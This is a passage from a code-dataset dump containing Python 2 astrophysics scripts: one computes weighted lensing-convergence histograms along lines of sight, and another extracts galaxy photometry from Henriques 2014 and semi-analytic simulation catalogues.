np.shape(kappa_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n del weight\n weight = np.copy(weight3_)\n print np.shape(kappa_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n print np.shape(kappa_)\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n del weight\n if (i == 0) and (j == 0):\n kappa = kappa_\n weight1 = weight1_\n weight2 = weight2_\n weight3 = weight3_\n else:\n kappa = np.append(kappa,kappa_)\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n weight3 = np.append(weight3,weight3_)\n #print j,i\n if weightin1 == \"gamma\":\n del weight1_\n del weight2_\n del weight3_\n del gamma1\n del gamma1_\n del gamma2\n del gamma2_\n del gamma\n else:\n del weight1_\n del weight2_\n del weight3_\n\nif conjoined == 4:\n med1 = np.zeros(8)\n med2 = np.zeros(8)\n med3 = np.zeros(8)\n med4 = np.zeros(8)\n filters1 = \"ugriz\"\n for j in range(1):\n for i in range(1):\n if weightin2 != \"gamma\":\n weight1_,weight2_,weight3_,weight4_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(weight1_index,weight2_index,weight3_index,weight4_index))\n if i == 0:\n weight1 = weight1_\n weight2 = weight2_\n weight3 = weight3_\n weight4 = weight4_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n weight3 = np.append(weight3,weight3_)\n weight4 = np.append(weight4,weight4_)\n else:\n weight1_,weight2_1_,weight2_2_,weight3_,weight4_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(weight1_index,2,3,weight3_index,weight4_index))\n if i == 0:\n weight1 = weight1_\n weight2_1 = weight2_1_\n weight2_2 = weight2_2_\n weight3 = weight3_\n weight4 = weight4_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2_1 = np.append(weight2_1,weight2_1_)\n weight2_2 = np.append(weight2_2,weight2_2_)\n weight3 = np.append(weight3,weight3_)\n weight4 = np.append(weight4,weight4_)\n #print j,i\n if weightin2 != \"gamma\":\n med1[j] = np.median(weight1)\n med2[j] = np.median(weight2)\n med3[j] = np.median(weight3)\n med4[j] = np.median(weight4)\n else:\n med1[j] = np.median(weight1)\n med2[j] = np.median(np.sqrt(weight2_1**2 + weight2_2**2))\n med3[j] = np.median(weight3)\n med4[j] = np.median(weight4)\n med_weight1 = np.mean(med1)\n med_weight2 = np.mean(med2)\n med_weight3 = np.mean(med3)\n med_weight4 = np.mean(med4)\n if weightin2 == \"gamma\":\n constr_weight2 = constr_weight2 / med_weight2\n constrwidth_weight2_inf = constrwidth_weight2_inf / med_weight2\n constrwidth_weight2_sup = constrwidth_weight2_sup / med_weight2\n E_w1_inf = np.max([1, round(med_weight1 * (constr_weight1 - constrwidth_weight1_inf))])\n E_w1_sup = np.max([1, round(med_weight1 * (-constr_weight1 + constrwidth_weight1_sup))])\n E_w2_inf = np.max([1, round(med_weight1 * (constr_weight2 - constrwidth_weight2_inf))])\n E_w2_sup = np.max([1, round(med_weight1 * (-constr_weight2 + constrwidth_weight2_sup))])\n E_w3_inf = np.max([1, round(med_weight1 * (constr_weight3 - constrwidth_weight3_inf))])\n E_w3_sup = np.max([1, round(med_weight1 * (-constr_weight3 + constrwidth_weight3_sup))])\n E_w4_inf = np.max([1, round(med_weight1 * (constr_weight4 - constrwidth_weight4_inf))])\n E_w4_sup = np.max([1, round(med_weight1 * (-constr_weight4 + constrwidth_weight4_sup))])\n if weightin2 == \"gamma\":\n del weight1\n del weight1_\n del weight2_1\n del weight2_1_\n del weight2_2\n del weight2_2_\n del weight3\n del weight3_\n del weight4\n del weight4_\n else:\n del weight1\n del weight1_\n del weight2\n del weight2_\n del weight3\n del weight3_\n del weight4\n del weight4_\n\n filters1 = filters\n for j in range(1):\n for i in range(1):\n if weightin2 != \"gamma\":\n kappa_, weight1_,weight2_,weight3_,weight4_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,weight1_index,weight2_index,weight3_index,weight4_index))\n weight1_ = weight1_ / med_weight1\n weight2_ = weight2_ / med_weight2\n weight3_ = weight3_ / med_weight3\n weight4_ = weight4_ / med_weight4\n else:\n kappa_, weight1_,weight3_,weight4_,gamma1_,gamma2_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,weight1_index,weight3_index,weight4_index,2,3))\n gamma1 = gamma1_\n gamma2 = gamma2_\n gamma = gamma1 # just so that the array has the correct shape\n gamma = np.sqrt(gamma1**2 + gamma2**2)\n weight1_ = weight1_ / med_weight1\n weight2_ = gamma / med_weight2\n weight3_ = weight3_ / med_weight3\n weight4_ = weight4_ / med_weight4\n weight = np.copy(weight1_)\n print np.shape(kappa_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight4_ = weight4_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n del weight\n weight = np.copy(weight2_)\n print np.shape(kappa_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight4_ = weight4_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n del weight\n weight = np.copy(weight3_)\n print np.shape(kappa_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight4_ = weight4_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n del weight\n weight = np.copy(weight4_)\n print np.shape(kappa_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight4 * med_weight1) - limsigma * E_w4_inf - increment4/2.0) & (weight * med_weight1 < round(constr_weight4 * med_weight1) + limsigma * E_w4_sup + increment4/2.0) ]\n print np.shape(kappa_)\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight4 * med_weight1) - limsigma * E_w4_inf - increment4/2.0) & (weight * med_weight1 < round(constr_weight4 * med_weight1) + limsigma * E_w4_sup + increment4/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight4 * med_weight1) - limsigma * E_w4_inf - increment4/2.0) & (weight * med_weight1 < round(constr_weight4 * med_weight1) + limsigma * E_w4_sup + increment4/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight4 * med_weight1) - limsigma * E_w4_inf - increment4/2.0) & (weight * med_weight1 < round(constr_weight4 * med_weight1) + limsigma * E_w4_sup + increment4/2.0) ]\n weight4_ = weight4_[(weight * med_weight1 >= round(constr_weight4 * med_weight1) - limsigma * E_w4_inf - increment4/2.0) & (weight * med_weight1 < round(constr_weight4 * med_weight1) + limsigma * E_w4_sup + increment4/2.0) ]\n del weight\n if (i == 0) and (j == 0):\n kappa = kappa_\n weight1 = weight1_\n weight2 = weight2_\n weight3 = weight3_\n weight4 = weight4_\n else:\n kappa = np.append(kappa,kappa_)\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n weight3 = np.append(weight3,weight3_)\n weight4 = np.append(weight4,weight4_)\n #print j,i\n if weightin1 == \"gamma\":\n del weight1_\n del weight2_\n del weight3_\n del weight4_\n del gamma1\n del gamma1_\n del gamma2\n del gamma2_\n del gamma\n else:\n del weight1_\n del weight2_\n del weight3_\n del weight4_\n\nprint(\" Read in %s seconds\" % (time.time() - start_time))\n\ngauss = sp.stats.norm(0, 1)\nstart1 = time.time()\nLOS = 0\n\nif conjoined == 4:\n for E1 in np.arange(-limsigma * E_w1_inf, limsigma * E_w1_sup + 1, increment1): # use as specific value\n for E2 in np.arange(-limsigma * E_w2_inf, limsigma * E_w2_sup + 1, increment2):\n for E3 in np.arange(-limsigma * E_w3_inf, limsigma * E_w3_sup + 1, increment3):\n for E4 in np.arange(-limsigma * E_w4_inf, limsigma * E_w4_sup + 1, increment4):\n print \"E1 = \", E1, \"in (\", -limsigma * E_w1_inf, \",\", limsigma * E_w1_sup, \") \", \"E2 = \", E2, \"in (\", -limsigma * E_w2_inf, \",\", limsigma * E_w2_sup, \") \", \"E3 = \", E3, \"in (\", -limsigma * E_w3_inf, \",\", limsigma * E_w3_sup, \") \", \"E4 = \", E4, \"in (\", -limsigma * E_w4_inf, \",\", limsigma * E_w4_sup, \") \" #, \"gauss_weight4 = \", gauss.pdf(float(E4)/E_w4)\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0) & (weight2 * med_weight1 >= round(constr_weight2 * med_weight1) + E2 - increment2/2.0) & (weight2 * med_weight1 < round(constr_weight2 * med_weight1) + E2 + increment2/2.0) & (weight3 * med_weight1 >= round(constr_weight3 * med_weight1) + E3 - increment3/2.0) & (weight3 * med_weight1 < round(constr_weight3 * med_weight1) + E3 + increment3/2.0) & (weight4 * med_weight1 >= round(constr_weight4 * med_weight1) + E4 - increment4/2.0) & (weight4 * med_weight1 < round(constr_weight4 * med_weight1) + E4 + increment4/2.0)] # this is equation 3 in Greene et al.\n if data.size > 0:\n if E1 < 0: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_inf)\n else: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_sup)\n if E2 < 0: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_inf)\n else: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_sup)\n if E3 < 0: gauss_factorE3 = gauss.pdf(float(E3)/E_w3_inf)\n else: gauss_factorE3 = gauss.pdf(float(E3)/E_w3_sup)\n if E4 < 0: gauss_factorE4 = gauss.pdf(float(E4)/E_w4_inf)\n else: gauss_factorE4 = gauss.pdf(float(E4)/E_w4_sup)\n kappa_constrained = np.histogram(data, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float) * gauss_factorE1 * gauss_factorE2 * gauss_factorE3 * gauss_factorE4 / data.shape[0]\n if LOS == 0:\n unbiased_kappa_constrained = kappa_constrained\n else:\n unbiased_kappa_constrained = unbiased_kappa_constrained + kappa_constrained\n LOS = LOS + data.size\n\nif conjoined == 3:\n for E1 in np.arange(-limsigma * E_w1_inf, limsigma * E_w1_sup + 1, increment1):\n for E2 in np.arange(-limsigma * E_w2_inf, limsigma * E_w2_sup + 1, increment2):\n for E3 in np.arange(-limsigma * E_w3_inf, limsigma * E_w3_sup + 1, increment3):\n print \"E1 = \", E1, \"in (\", -limsigma * E_w1_inf, \",\", limsigma * E_w1_sup, \") \", \"E2 = \", E2, \"in (\", -limsigma * E_w2_inf, \",\", limsigma * E_w2_sup, \") \", \"E3 = \", E3, \"in (\", -limsigma * E_w3_inf, \",\", limsigma * E_w3_sup, \") \"#, \"gauss_weight4 = \", gauss.pdf(float(E4)/E_w4)\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0) & (weight2 * med_weight1 >= round(constr_weight2 * med_weight1) + E2 - increment2/2.0) & (weight2 * med_weight1 < round(constr_weight2 * med_weight1) + E2 + increment2/2.0) & (weight3 * med_weight1 >= round(constr_weight3 * med_weight1) + E3 - increment3/2.0) & (weight3 * med_weight1 < round(constr_weight3 * med_weight1) + E3 + increment3/2.0)] # this is equation 3 in Greene et al.\n if data.size > 0:\n if E1 < 0: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_inf)\n else: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_sup)\n if E2 < 0: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_inf)\n else: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_sup)\n if E3 < 0: gauss_factorE3 = gauss.pdf(float(E3)/E_w3_inf)\n else: gauss_factorE3 = gauss.pdf(float(E3)/E_w3_sup)\n kappa_constrained = np.histogram(data, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float) * gauss_factorE1 * gauss_factorE2 * gauss_factorE3 / data.shape[0]\n if LOS == 0:\n unbiased_kappa_constrained = kappa_constrained\n else:\n unbiased_kappa_constrained = unbiased_kappa_constrained + kappa_constrained\n LOS = LOS + data.size\n\nif conjoined == 2:\n for E1 in np.arange(-limsigma * E_w1_inf, limsigma * E_w1_sup + 1, increment1):\n for E2 in np.arange(-limsigma * E_w2_inf, limsigma * E_w2_sup + 1, increment2):\n print \"E1 = \", E1, \"in (\", -limsigma * E_w1_inf, \",\", limsigma * E_w1_sup, \") \", \"E2 = \", E2, \"in (\", -limsigma * E_w2_inf, \",\", limsigma * E_w2_sup, \") \" #, \"gauss_weight4 = \", gauss.pdf(float(E4)/E_w4)\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0) & (weight2 * med_weight1 >= round(constr_weight2 * med_weight1) + E2 - increment2/2.0) & (weight2 * med_weight1 < round(constr_weight2 * med_weight1) + E2 + increment2/2.0)] # this is equation 3 in Greene et al.\n if data.size > 0:\n if E1 < 0: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_inf)\n else: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_sup)\n if E2 < 0: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_inf)\n else: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_sup)\n kappa_constrained = np.histogram(data, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float) * gauss_factorE1 * gauss_factorE2 / data.shape[0]\n if LOS == 0:\n unbiased_kappa_constrained = kappa_constrained\n else:\n unbiased_kappa_constrained = unbiased_kappa_constrained + kappa_constrained\n LOS = LOS + data.size\n\nif conjoined == 1:\n for E1 in np.arange(-limsigma * E_w1_inf, limsigma * E_w1_sup + 1, increment1):\n print \"E1 = \", E1, \"in (\", -limsigma * E_w1_inf, \",\", limsigma * E_w1_sup, \") \" #, \"gauss_weight4 = \", gauss.pdf(float(E4)/E_w4)\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0)] # this is equation 3 in Greene et al.\n if data.size > 0:\n if E1 < 0: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_inf) # for asymmetric limits, implement a gaussian on each side\n else: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_sup)\n kappa_constrained = np.histogram(data, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float) * gauss_factorE1 / data.shape[0]\n if LOS == 0:\n unbiased_kappa_constrained = kappa_constrained\n else:\n unbiased_kappa_constrained = unbiased_kappa_constrained + kappa_constrained # I tested that this addition works correctly\n LOS = LOS + data.size\n\nhead = 'LOS: %d' % np.array([LOS])\nnp.savetxt(output,unbiased_kappa_constrained,header=head,fmt='%s',delimiter='\\t',newline='\\n')\nprint(\" time for computing kappa %s seconds\" % (time.time() - start1))\n\nif (conjoined == 1) | (conjoined == 2) | (conjoined == 3) | (conjoined == 4):\n print \"increment1 = \", increment1\nif (conjoined == 2) | (conjoined == 3) | (conjoined == 4):\n print \"increment2 = \", increment2\nif (conjoined == 3) | (conjoined == 4):\n print \"increment3 = \", increment3\nif conjoined == 4:\n print \"increment4 = \", increment4\n\nprint(\" Total time --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.47431495785713196, "alphanum_fraction": 0.5201787948608398, "avg_line_length": 84.28729248046875, "blob_id": "0aaa238dc3fbe620c7897465813dc277a00789ac", "content_id": "13400b08c43df633701d311bd5ed7961e5ff53e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15437, "license_type": "no_license", "max_line_length": 292, "num_lines": 181, "path": "/python/catalogue_utilities/testreadHenriques2014.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# extract Henriques 2014 galaxies from *.images.ugriz.txt\nimport numpy as np\npl = np.linspace(30,62,62-30 + 1)\nout = np.empty(6)\nfor i in range(len(pl)):\n print int(pl[i])\n x = np.loadtxt(\"GGL_los_8_0_0_N_4096_ang_4_Henriques2014_galaxies_on_plane_%s_f.images.ugriz.txt\" % int(pl[i]),usecols=[4,5,6,7,8,9])\n j = 0\n ind = 0\n while (j < 1000) and (ind < len(x)):\n if x[ind][4]<23:\n out = np.c_[out,x[ind]]\n j += 1\n ind += 1\nnr = np.linspace(1,len(out[0]),len(out[0]))\nnp.savetxt(\"Henriques2014selectforBPZ.cat\",np.c_[nr,out[0],out[1],out[2],out[3],out[4],out[5]],fmt='%d %1.4f %1.2f 0.00 %1.2f 0.00 %1.2f 0.00 %1.2f 0.00 %1.2f 0.00', header = 'id z_s u u_err g g_err r r_err i i_err z z_err')\n\n# now also extract from SA\nimport numpy as np\nout = np.loadtxt(\"/Volumes/LaCieDavis/lensing_simulations/SA_galaxies/original/original/GGL_los_8_0_0_0_0_N_4096_ang_4_SA_galaxies_on_plane_27_to_63.images.txt\",usecols=[5,12,13,14,15,16], comments=\"GalID\",unpack=True)\nnr = np.linspace(1,len(out[0]),len(out[0]))\nnp.savetxt(\"/Users/cerusu/Dropbox/Davis_work/code/0408/SAselectforBPZ.cat\",np.c_[nr,out[0],out[1],out[2],out[3],out[4],out[5]],fmt='%d %1.4f %1.2f 0.00 %1.2f 0.00 %1.2f 0.00 %1.2f 0.00 %1.2f 0.00', header = 'id z_s u u_err g g_err r r_err i i_err z z_err')\n\n# now extract from .images\nimport numpy as np\npl = np.linspace(30,62,62-30 + 1)\nout = np.empty(7)\n\ngalaxy_struct = np.dtype([\n ('galaxy_id' ,'i8' ), #0_LL $ , , id of galaxy (unique)\n ('halo_id' ,'i8' ), #0_LL $ , , id of (sub)halo, the galaxy belongs to(?)\n ('first_prog_gal' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('next_prog_gal' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('last_prog_gal' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('FOF_central_gal' ,'i8' ), #0_LL $ , , id of fof halo the galaxy belong to (i.e. common id for all galaxies in same group or cluster)\n ('file_tree_nr' ,'i8' ), #0_LL $ , , id of file containing the merger tree the galaxy belongs to\n ('descendant_gal' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('main_leaf_id' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('tree_root_id' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('subhalo_id' ,'i8' ), #0_LL $ , , id of (sub)halo, the galaxy belongs to(?)\n ('main_subhalo_id' ,'i8' ), #0_LL $ , , id of main (sub)halo of fof halo, the galaxy belongs to(?)\n ('peano_key' ,'i4' ), #0L $ , , id of small subcube of simulation cube containing galaxy\n ('redshift' ,'f4' ), #0.0 $ , , redshift of galaxy\n ('type' ,'i4' ), #0L $ , , indicated positional status of galaxy in fof group (0 = central, 1 = satellite with subhalo, 2= satellite without resolved subhalo)\n ('snapshot_number' ,'i4' ), #0L $ , , simulation snapshot the galaxy belongs to\n ('group_number' ,'i4' ), #0L $ , , yet another id of the fof halo the galaxy belongs to\n ('next_group_number' ,'i4' ), #0L $ , , yet another id of the fof halo the galaxy will belong to in the next snapshot\n ('cube_index' ,'i4' ), #0L $ , , index of periodic copy of simulation cube the galaxy is located\n ('central_m_vir' ,'f4' ), #0.0 $ , [10^10 Msun/h] , virial mass (as defined by m_crit200) of the FOF group the galaxy resides in.\n ('central_r_vir' ,'f4' ), #0.0 $ , [Mpc/h] , virial radius (as defined by r_crit200) of the FOF group the galaxy resides in\n ('position' ,'f4', 3), #fltarr(3) $ , [rad, rad, Mpc/h] , angular position (first two components) and line-of-sight comoving distance (last component) of galaxy\n ('velocity' ,'f4', 3), #fltarr(3) $ , [km/s] , physical peculiar velocity of galaxy (first two components transverse, last component parallel to l.o.s.)\n ('len' ,'i4' ), #0L $ , , number of particle in subhalo associated with galaxy\n ('m_vir' ,'f4' ), #0.0 $ , [10^10 Msun/h] , virial mass (as defined by m_crit200) of the FOF group this galaxy was in when last it was a type 0 galaxy. I.e. current mass for type 0 galaxies, \"infall virial mass\" for type 1,2 galaxies.\n ('r_vir' ,'f4' ), #0.0 $ , [Mpc/h] , comoving virial radius (as defined by r_crit200) of the FOF group this galaxy was in when last it was a type 0 galaxy. I.e. current virial radius for type 0 galaxies, \"infall virial radius\" for type 1,2 galaxies\n ('v_vir' ,'f4' ), #0.0 $ , [km/s] , physical virial velocity of the subhalo the galaxy is/was the center of.\n ('v_max' ,'f4' ), #0.0 $ , [km/s] , physical maximum rotational velocity of the subhalo of which this galaxy is the center, or the last value for satellite galaxies.\n ('gas_spin' ,'f4', 3), #fltarr(3) $ , [Mpc/h km/s] , spin of the cold gas disk of galaxy\n ('stellar_spin' ,'f4', 3), #fltarr(3) $ , [Mpc/h km/s] , spin of the stellar disk of galaxy\n ('infall_v_max' ,'f4' ), #0.0 $ , [km/s] , physical maximum rotational velocity of the host halo of this galaxy atinfallSnap.\n ('infall_v_max_peak' ,'f4' ), #0.0 $ , [km/s] , physical maximum past rotational velocity of the host halo of this galaxy.\n ('infall_snap' ,'f4' ), #0L $ , , id of snapshot the galaxy lost type = 0 status\n ('infall_hot_gas' ,'f4' ), #0.0 $ , [10^10 Msun/h] , mass in hot gas at the time of infall (same as hotGas for type 0 galaxies).\n ('hot_radius' ,'f4' ), #0.0 $ , [Mpc/h] , radius out to which hot gas extends: rvir for type 0; 0 for type 2; maximum radius out to which hot gas is not stripped for type 1.\n ('ori_merg_time' ,'f4' ), #0.0 $ , [yr] , estimated dyniamical friction time (in years) when the merger clock is set.\n ('merg_time' ,'f4' ), #0.0 $ , [yr] , estimated remaining merging time (in years). oriMergeTime - time since the merger clock is set.\n ('distance_to_central_gal' ,'f4', 3), #fltarr(3) $ , [Mpc/h (?)] , distance between this galaxy and the central galaxy of the fof group\n ('cold_gas' ,'f4' ), #0.0 $ , [10^10 Msun /h] , Mass in the cold gas disk.\n ('stellar_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , total mass in stars in the disk and the bulge together.\n ('bulge_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass of stars in the bulge.\n ('disk_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass of stars in the disk.\n ('hot_gas' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in hot gas.\n ('ejected_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in the ejected mass component\n ('black_hole_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass of the central black hole\n ('ICM' ,'f4' ), #0.0 $ , (?)\n ('metals_cold_gas' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in cold gas\n ('metals_bulge_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in bulge\n ('metals_disk_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in disk\n ('metals_hot_gas' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in hot gas\n ('metals_ejected_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in the ejected mass component\n ('metals_ICM' ,'f4' ), #0.0 $ , (?)\n ('primordial_accretion_rate' ,'f4' ), #0.0 $ , [Msun/yr] , Accretion rate of primordial gas.\n ('cooling_rate' ,'f4' ), #0.0 $ , [Msun/yr] , cooling rate\n ('cooling_rate_before_AGN' ,'f4' ), #0.0 $ , [Msun/yr] , cooling rate if there was no AGN feedback.\n ('sfr' ,'f4' ), #0.0 $ , [Msun/yr] , Star formation rate\n ('sfr_bulge' ,'f4' ), #0.0 $ , [Msun/yr] , Star formation rate in bulge.\n ('x_ray_lum' ,'f4' ), #0.0 $ , [log10(erg/sec)] , Log10 of X-Ray luminosity in erg/sec\n ('bulge_size' ,'f4' ), #0.0 $ , [Mpc/h] , Half mass radius of bulge\n ('stellar_disk_radius' ,'f4' ), #0.0 $ , [Mpc/h] , Size of the stellar disk, 3x the scale length.\n ('gas_disk_radius' ,'f4' ), #0.0 $ , [Mpc/h] , Size of the gas disk (?)\n ('cos_inclination' ,'f4' ), #0.0 $ , (?)\n ('disrupt_on' ,'i4' ), #0L $ , , 0: galaxy merged onto merger center; 1: galaxy was disrupted before merging onto its descendant, matter went into ICM of merger center\n ('merge_on' ,'i4' ), #0L $ , , 0: merger clock not set yet;\n 